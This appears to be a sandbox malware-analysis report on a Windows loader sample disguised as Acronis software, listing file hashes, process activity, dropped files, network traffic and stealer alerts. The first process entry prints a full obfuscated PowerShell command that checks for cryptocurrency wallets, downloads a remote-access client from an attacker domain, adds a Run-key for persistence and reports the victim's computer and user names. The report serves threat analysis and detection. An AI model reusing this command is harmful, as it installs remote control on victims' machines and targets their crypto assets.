| File name: | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch |
| Full analysis: | https://app.any.run/tasks/394a0c60-f5b5-43b3-af2f-4db53d21037c |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | November 21, 2024, 03:46:19 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 6 sections |
| MD5: | 40F9287E828DB87DD3259B53585ADF31 |
| SHA1: | 6622AB252D7EB53C8204C9939E514C021B5B50D5 |
| SHA256: | 5EDFC69B348477464FBF4A9434F9FF3C361E818DD6FB40BDC5B99CA31E1C3D38 |
| SSDEEP: | 98304:sqTAWJqWt5uOveevUoJSKzzbNHsSM7/pKLqb/zsK+f97zP:fJ3 |
| .exe | | | Win64 Executable (generic) (76.3) |
|---|---|---|
| .exe | | | Win32 Executable (generic) (12.4) |
| .exe | | | Generic Win/DOS Executable (5.5) |
| .exe | | | DOS Executable Generic (5.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 0000:00:00 00:00:00 |
| ImageFileCharacteristics: | No relocs, Executable, 32-bit, No debug |
| PEType: | PE32 |
| LinkerVersion: | 3 |
| CodeSize: | 3499520 |
| InitializedDataSize: | 311808 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x4fa70 |
| OSVersion: | 4 |
| ImageVersion: | 1 |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.0.109 |
| ProductVersionNumber: | 1.0.0.109 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Windows NT 32-bit |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | ASCII |
| CompanyName: | Acronis International GmbH |
| FileDescription: | Local GRPM mini |
| FileVersion: | 1.0.0-109 |
| LegalCopyright: | Copyright (C) Acronis International GmbH, 2002-2024 |
| LegalTrademarks: | Acronis International GmbH. All rights reserved. |
| OriginalFileName: | grpm-mini.exe |
| ProductName: | Local GRPM mini |
| ProductVersion: | 1.0.0-109 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1920 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e $ o f b w = ' h K c U : \ S o f T w A r e \ C L A S s E s \ ' ;   $ K 2 T f z = ' c : \ p R o g R A M   F i l e s \ ' ;   $ n S k F 7 = 0 ;   $ 5 8 4 f = ( g E T - w M i O B J e C T   - C l a s S   W i N 3 2 _ c O m P U T E R S y s T e m ) . p A r T O f D o m A i n ;   $ X T U 8 = ' h k c U : \ s o f T w A r e \ ' ;   $ K i r H = ' H k L M : \ s o F t w A r E \ C l A S s e s \ ' ;   $ 5 t v Z P = $ e N v : L O c A l a p p d a T a + ' \ P R O G R A m s \ ' ;   $ v j T A = @ (   $ O f b W + ' A O p P ' ;   $ o f b W + ' k e E p k E Y ' ;   $ K i r H + ' B C v A u L T ' ;   $ 5 T V Z p + ' K e e P k E y - D e s K T o P \ k e E p k E y   D e s k T o p . e X E ' ;   $ x t U 8 + ' R E A L   s e c u r I T y \ B C V A u L T ' ;   $ o F b W + ' C y P h e R o c k ' ;   $ 5 t v Z P + ' T r E z O R   S U I T E \ t r E Z O r   S U I t E . e x E ' ;   $ x t u 8 + ' m I C R O s O f t \ w I n d o W S \ c U r r E N T v e r S I o N \ u n I n s t A L l \ b i T b O x A P p ' ;   $ 5 T v Z p + ' c y p H E R o c k   C Y s Y N C \ C Y P h E r o c k   C Y S y n C . e X e ' ;   $ K 2 T f z + ' B i T b o x \ B I t b o X . E x E ' ;   $ o F b W + ' o N e K E Y - w A l L e t ' ;   $ 5 t v z P + ' k e E V O - W A L L E T \ K e E V o   L I n k . e X E ' ;   $ o F B W + ' L I q U i D n e T w o R k ' ;   $ o F B W + ' t r e Z o R S U I t E ' ;   $ k 2 t F Z + ' b l o C K S T R e a M \ B l O c K s t R e a M   G R e e N \ B L O C k s t r E A M   G r e E n . e x E ' ;   $ k I r H + ' l e d g e r l i v e ' ;   $ X t u 8 + ' b I T b O x A p p ' ;   $ K 2 t F Z + ' O n E k e Y \ o n e K E y . e x E ' ;   $ o f B w + ' k E e V O ' ;   $ K 2 T f Z + ' B C   V a U L T \ B C v A U L t . E x E ' ;   $ 5 T v z p + ' r A b B Y - d E S K T o P \ r a B b Y   d e s k t o P . E x e ' ;   $ K 2 T F Z + ' L e d g e r   L i v E \ L e D G E r   l I V e . e X e ' ;   ) ;   $ r z Q a 5 = $ V J T a . L E N G t h ;   I F   ( $ 5 8 4 F )   { $ n S K f 7 = 1 }   e l S E   {   F o R   ( $ g k X l = 0 ;   $ g k X L   - l T   $ r Z q a 5   - a N d   $ n s k F 7   - E q   0 ;   $ g K x L + + )   {   i f   ( t e s t - p a T H   $ v J t a [ $ G k x L ] )   { $ n S K F 7 = 1 } ; } ; } ;   i F   ( $ n S K F 7   - E Q   1 )   {   [ n E T . s e R v I c e P O I N T m A N a g E R ] : : s E c U R i t Y p R O t O c o L   =   [ N e t . S E c u R i t y P R o t o C o l T y P e ] : : t L S 1 2 ;   $ U 9 s O t y = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / s n o w . z i p ' ;   $ y t B d 4 S = ' D e f r a g C l i e n t ' ;   C h D I R   $ E N V : a P p d a t A ;   $ J 8 f e q x r W = G E t - C O m M A n D   S T a r T - B i t S t r a N S f e r   - E R R O R a c t I O N   S i L E N T l y c O N T I N u E ;   $ W p h b A O q W = " { 0 } \ { 1 } "   - f   $ E n V : A p p d a t A ,   $ y t B d 4 S ;   T r Y   {   N e w - i T E m   - p a T h   $ e n V : A P p D a T A   - N A M E   $ y t B d 4 S   - i T e M T Y p E   ' d i r e c t o r y ' ;   A d d - T y p e   - A S S e m b l y n A m e   S y S t e M . I O . C o M p r E s S i O N ,   s Y S T e m . i o . C O M P r e s s i o n . f i l E S Y S T e m   - e R R O R a C t I O N   S I l e n t l Y c O n T I N u E ;   $ o T v Q T m T = ( C U R l   - U r i   $ U 9 s O t y   - U s E B A S I C P A R S I n g ) . c O n T e N t ;   $ u p K 3 8 6 = n E w - O b j e c t   s Y S T e m . i O . M E M O r Y s T r E A M ;   $ u p K 3 8 6 . w r i T e ( $ o T v Q T m T ,   0 ,   $ o T v Q T m T . L E N G t H ) ;   $ u p K 3 8 6 . s E E k ( 0 ,   [ S Y S T e M . I O . s e E k o r i G i n ] : : B E G i N )   |   o u T - N u l L ;   $ b 1 s a q q Q r = n E w - o b j E c t   s Y s t e M . I O . C O m P r E s S I O n . Z I p A r c H I v E ( $ u p K 3 8 6 ,   [ s Y S t E m . I o . c o M p R E s S I o n . Z I P a R c H I v E M O D E ] : : R e a d ) ;   f O R e A C h ( $ Z e Z q s H   i n   $ b 1 s a q q Q r . e n t r I E s )   {   $ B Y u c 8 M = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ Z e Z q s H . N a M E ;   $ 6 3 Y 3 r j 5 F = $ Z e Z q s H . o p e N ( ) ;   $ F 5 Y d W 8 F = [ S y s t e m . i o . f I L E ] : : C r e a T e ( $ B Y u c 8 M ) ;   $ 6 3 Y 3 r j 5 F . C o p Y t o ( $ F 5 Y d W 8 F ) ;   $ F 5 Y d W 8 F . c L o s e ( ) ;   $ 6 3 Y 3 r j 5 F . c l o S e ( ) ; }   $ b 1 s a q q Q r . d I s P O s E ( ) ;   $ u p K 3 8 6 . D i s P o S E ( ) ;   }   c a t c h   { N e w - i T E m   - P A T H   $ E n v : a P p D A t a   - n A M e   $ y t B d 4 S   - i t e m t y p e   ' d i r e c t o r y ' ;   $ I u 4 Z n 1 = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / ' ;   $ t I V p p k B = @ ( ' T C C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ,   ' c l i e n t 3 2 . e x e ' ,   ' n s m _ v p r o . i n i ' ,   ' n s k b f l t r . i n f ' ,   ' p c i c a p i . d l l ' ,   ' P C I C H E K . D L L ' ,   ' H T C T L 3 2 . D L L ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' N S M . L I C ' ,   ' c l i e n t 3 2 . i n i ' ,   ' P C I C L 3 2 . D L L ' ) ;   I F   ( $ J 8 f e q x r W )   {   $ t I V p p k B   |   F o r E A C H - o b j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = $ W p h b A O q W + ' \ ' + $ _ ;   S t a R t - b I t S T R A N s F e R   - s O u r C E   $ G 1 6 Q 4 a U   - D E S T I N a T i o N   $ J n s A 5 f x U ;   } ; }   e L s e   {   $ t I V p p k B   |   f O r e a c h - O B j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ _ ;   $ x Q f y 4 F e s = ' b I t s a D M I n . e X E   / t r A n S f e r   X 5 y 6 Y J   / d O W n L o A D   / P R i O r I T y   N O r m a l   ' + $ G 1 6 Q 4 a U + '   ' + $ J n s A 5 f x U ;   &   $ x Q f y 4 F e s ; } ;   } ;   } ;   $ 6 a L Z w U = G e t - I t E m   $ W p h b A O q W   - f o R C e ;   $ 6 a L Z w U . A t t R I B U T e s = ' H i d d e n ' ;   C d   $ W p h b A O q W ;   $ P K a T h x v 4 = $ W p h b A O q W ,   ' c l i e n t 3 2 . e x e '   - J O i n   ' \ ' ;   N e W - I t E M p R o P e R T y   - P a t H   ' h k C u : \ S O f t w a r E \ M I C R o S O f t \ W I N D O W S \ C u r R e n T v e R S I o N \ r u n '   - n A M e   $ y t B d 4 S   - V a L U e   $ P K a T h x v 4   - p R o P E R T y t y p e   ' S t r i n g ' ;   s T a R T   C L I E n T 3 2 . E X E ;   $ 3 2 H a O = p s   c l i e n t 3 2   - e r r o r a C t i O n   s i L e N T L y C O N t I n u e ;   $ S f b 0 = " h t t p s : / / s n o w q u e e n . s i t e / s n o w s / r e c a l l i n g . p h p ? c p n m e = $ E n v : c O M p u t e r N A M E & u s n m e = $ e n V : U s E r N A m E & p a r a m = " ;   I F   ( $ 3 2 H a O . i d )   {   $ q t f C D = $ S f b 0 + ' p H q B ' ;   W g e t   $ q t f C D   - u s E B A S I C p A r S I n G ; }   e l s e   {   $ q t f C D = $ S f b 0 + ' k z h U 2 ' ;   W g e t   $ q t f C D   - U s e b a s i c p a r S i N G ; } ;   } ;  | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2040 | powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2972 | "C:\Users\admin\AppData\Roaming\HTAKBA.com" "C:\Users\admin\AppData\Roaming\YCD7OD.bin" | C:\Users\admin\AppData\Roaming\HTAKBA.com | — | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | |||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script (Beta) Exit code: 0 Version: 3, 3, 15, 1 Modules
| |||||||||||||||
| 3040 | powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5376 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5696 | "C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe" | C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | explorer.exe | ||||||||||||
User: admin Company: Acronis International GmbH Integrity Level: MEDIUM Description: Local GRPM mini Exit code: 0 Version: 1.0.0-109 Modules
| |||||||||||||||
| 6092 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (3040) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5696 | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | C:\Users\admin\AppData\Roaming\YCD7OD.bin | — | |
MD5:— | SHA256:— | |||
| 2040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04bvay3o.mvx.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5696 | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | C:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1 | text | |
MD5:909DABB4B6591DDCBE2DF0395650DCCA | SHA256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3 | |||
| 5696 | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | C:\Users\admin\AppData\Local\Temp\LNOKOK7ULD2D9QRT.exe | html | |
MD5:46DD133EE00DC1BAE5E4EEBA7B88432F | SHA256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66 | |||
| 2040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p1ol03i2.ajj.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5696 | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | C:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1 | text | |
MD5:EB8A82CF3676AEB10AF460E8A5049BE5 | SHA256:B7E1DD2A46E27759D538B5A7C76BE23A8010FA5322E093259FA6100B10CF7D14 | |||
| 2040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_32jytxdb.2wt.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1920 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bkjewxrv.bgp.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2040 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:B6B36C1CF9C23D33D34BCDFFA440B802 | SHA256:B484E946EF1102BEDE0ABD15476262BD2AAF9E651BD87993C48DA929DDA7CC10 | |||
| 2040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4zqhghep.304.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5544 | RUXIMICS.exe | GET | 200 | 2.16.164.9:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4932 | svchost.exe | GET | 200 | 2.16.164.9:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5544 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4932 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.9:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | POST | 200 | 188.114.97.3:443 | https://foresttrail.shop/api | unknown | text | 15 b | malicious |
— | — | POST | 200 | 188.114.96.3:443 | https://foresttrail.shop/api | unknown | text | 15 b | malicious |
— | — | POST | 200 | 188.114.97.3:443 | https://foresttrail.shop/api | unknown | text | 15 b | malicious |
— | — | POST | 200 | 188.114.97.3:443 | https://foresttrail.shop/api | unknown | text | 2 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
5544 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4932 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 2.23.209.182:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.164.9:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
5544 | RUXIMICS.exe | 2.16.164.9:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
4932 | svchost.exe | 2.16.164.9:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
foresttrail.shop |
| unknown |
pastebin.com |
| shared |
cdn1.pixel-story.shop |
| unknown |
silversky.club |
| malicious |
zasa.r2cloudmikudau8.shop |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
5696 | 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe | A Network Trojan was detected | STEALER [ANY.RUN] Lumma Stealer TLS Connection |
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |